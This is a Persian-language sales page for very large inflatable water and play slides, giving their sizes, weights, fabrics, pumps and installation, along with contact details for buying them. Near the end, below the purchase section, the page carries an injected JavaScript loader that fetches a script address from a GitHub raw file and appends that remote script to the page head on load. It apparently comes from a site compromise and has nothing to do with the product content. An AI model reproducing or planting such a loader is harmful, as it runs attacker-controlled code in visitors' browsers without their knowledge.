بزرگ ترین سرسره بادی های بادی سازان مجد

بزرگ ترین سرسره بادی های بادی سازان مجد

  • بزرگ ترین سرسره بادی این دستگاه فقط در پارک های آبی و شهر بازی ها و پارک های فضای بزرگ دارند قابل استفاده می باشد. این سرسره ها از شاه کار های تولیدی بادی سازان مجد می باشد

    بزرگترین سرسره بادی آبی

    بزرگترین سرسره بادی آبی دستگاه خاورماینه است که در که با هوا باد می شود و در کنار آن برای هیجان بیشتر از آب هم استفاده می شود. این دستگاه در بالای جدول بزرگ ترین سرسره بادی های مجدسازه می باشد. ابعاد و اندازه این دستگاه به طول 45 متر و عرض 13.5 متر و آن ارتفاع 13 متر می باشد. وزن این سرسره حدود 1500 کیلوگرم است. البته این مقادیر کاملا قابل تغییر و سفارشی سازی می باشند. جنس این سرسره از دوخت دقیقی با نخ ترکیه ای است و همچنین پارچه این سرسره پارچه کره ای با کیفیت بالا است. این سرسره دارای روکش سر می باشد که در صورت خرابی می توانید مجددا با کمترین هزینه آن را تهیه نمایید. همچنین این سرسره دارای دو پمپ به مقادیر 1.5 و 1 اسب می باشد.حمل و نقل و نصب بزرگ ترین سرسره بادی های مجدسازه به صورت سه تکه جداگانه به محل نصب حمل شده، سپس کارشناسان ما برای نصب و راه اندازی آن اقدام میکنند. این سرسره بادی نیازمند 60 عدد بند مهار ( طناب مهار ) می باشد که توسط مجریان پروژه نصب و راه اندازی می گردد. اطلاعات سایت قبلی

    سرسره بادی بزرگ عصر یخبندان

    قصر بادی بزرگ عصر یخبندان یک قصر بادی بزرگ دو سر جدید که جزو بزرگ ترین سرسره بادی های مجدسازه است. این دستگاه فقط در شهر بازی های و پارک های فضای بزرگ دارند قابل استفاده می باشد. ابعاد اندازه طول 9 متر و عرض آن 7 متر و ارتفاع این سرسره بادی به 7.5 متر می رسد که در فضاهایی باز استفاده می شود. همچنین جهت حمل نقل باید بدانید وزن کلی این سرسره 400 کیلوگرم می باشد. جنس این سرسره از دوخت دقیقی با نخ ترکیه ای است و همچنین پارچه این سرسره پارچه کره ای با کیفیت بالا استفاده می شود.

    سرسره بادی مردعنکبوتی

    سرسره بادی مردعنکبوتی از بزرگ ترین سرسره بادی های مجدسازه، سرسره بزرگ دو سر می باشد این دستگاه فقط در شهر بازی های و پارک های فضای بزرگ دارند قابل استفاده می باشد.طول قصر بادی بزرگ 12 متر و عرض آن 8.5 متر و ارتفاع آن به 11 متر می رسد که در فضاهایی باز استفاده می شود و وزن کلی این سرسره 560 کیلوگرم می باشد. جنس این سرسره از دوخت دقیقی با نخ ترکیه ای است و همچنین پارچه این سرسره پارچه کره ای با کیفیت بالا استفاده می شود.

    نحوه خرید

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید این دستگاه ها می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید